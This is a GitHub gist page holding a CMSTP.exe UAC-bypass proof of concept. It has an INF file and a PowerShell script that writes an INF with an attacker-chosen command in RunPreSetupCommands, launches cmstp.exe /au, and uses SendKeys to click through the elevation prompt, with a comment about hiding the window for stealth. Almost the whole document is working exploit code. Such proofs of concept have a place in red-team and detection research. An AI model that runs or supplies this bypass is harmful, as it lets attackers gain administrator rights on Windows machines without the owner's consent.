Skip to content

Instantly share code, notes, and snippets.

@tylerapplebaum
Forked from api0cradle/CorpVPN.cmp
Last active August 28, 2024 14:18
Show Gist options
  • Save tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1 to your computer and use it in GitHub Desktop.
Save tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1 to your computer and use it in GitHub Desktop.
CMSTP.exe scripts and files
; No longer needed - embedded in script now
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall]
CustomDestination=CustInstDestSectionAllUsers
RunPreSetupCommands=RunPreSetupCommandsSection
[RunPreSetupCommandsSection]
; Commands Here will be run Before Setup Begins to install
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
taskkill /IM cmstp.exe /F
[CustInstDestSectionAllUsers]
49000,49001=AllUSer_LDIDSection, 7
[AllUSer_LDIDSection]
"HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\CMMGR32.EXE", "ProfileInstallPath", "%UnexpectedError%", ""
[Strings]
ServiceName="CorpVPN"
ShortSvcName="CorpVPN"
# UAC Bypass poc using SendKeys
# Version 1.0
# Author: Oddvar Moe
# Functions borrowed from: https://powershell.org/forums/topic/sendkeys/
# Todo: Hide window on screen for stealth
# Todo: Make script edit the INF file for command to inject...
Function script:Set-INFFile {
[CmdletBinding()]
Param (
[Parameter(HelpMessage="Specify the INF file location")]
$InfFileLocation = "$env:temp\CMSTP.inf",
[Parameter(HelpMessage="Specify the command to launch in a UAC-privileged window")]
[String]$CommandToExecute = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
)
$InfContent = @"
[version]
Signature=`$chicago`$
AdvancedINF=2.5
[DefaultInstall]
CustomDestination=CustInstDestSectionAllUsers
RunPreSetupCommands=RunPreSetupCommandsSection
[RunPreSetupCommandsSection]
; Commands Here will be run Before Setup Begins to install
$CommandToExecute
taskkill /IM cmstp.exe /F
[CustInstDestSectionAllUsers]
49000,49001=AllUSer_LDIDSection, 7
[AllUSer_LDIDSection]
"HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\CMMGR32.EXE", "ProfileInstallPath", "%UnexpectedError%", ""
[Strings]
ServiceName="CorpVPN"
ShortSvcName="CorpVPN"
"@
$InfContent | Out-File $InfFileLocation -Encoding ASCII
}
Function Get-Hwnd
{
[CmdletBinding()]
Param
(
[Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)] [string] $ProcessName
)
Process
{
$ErrorActionPreference = 'Stop'
Try
{
$hwnd = Get-Process -Name $ProcessName | Select-Object -ExpandProperty MainWindowHandle
}
Catch
{
$hwnd = $null
}
$hash = @{
ProcessName = $ProcessName
Hwnd = $hwnd
}
New-Object -TypeName PsObject -Property $hash
}
}
function Set-WindowActive
{
[CmdletBinding()]
Param
(
[Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)] [string] $Name
)
Process
{
$memberDefinition = @'
[DllImport("user32.dll")] public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
[DllImport("user32.dll", SetLastError = true)] public static extern bool SetForegroundWindow(IntPtr hWnd);
'@
Add-Type -MemberDefinition $memberDefinition -Name Api -Namespace User32
$hwnd = Get-Hwnd -ProcessName $Name | Select-Object -ExpandProperty Hwnd
If ($hwnd)
{
$onTop = New-Object -TypeName System.IntPtr -ArgumentList (0)
[User32.Api]::SetForegroundWindow($hwnd)
[User32.Api]::ShowWindow($hwnd, 5)
}
Else
{
[string] $hwnd = 'N/A'
}
$hash = @{
Process = $Name
Hwnd = $hwnd
}
New-Object -TypeName PsObject -Property $hash
}
}
. Set-INFFile
#Needs Windows forms
add-type -AssemblyName System.Windows.Forms
If (Test-Path $InfFileLocation) {
#Command to run
$ps = new-object system.diagnostics.processstartinfo "c:\windows\system32\cmstp.exe"
$ps.Arguments = "/au $InfFileLocation"
$ps.UseShellExecute = $false
#Start it
[system.diagnostics.process]::Start($ps)
do
{
# Do nothing until cmstp is an active window
}
until ((Set-WindowActive cmstp).Hwnd -ne 0)
#Activate window
Set-WindowActive cmstp
#Send the Enter key
[System.Windows.Forms.SendKeys]::SendWait("{ENTER}")
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment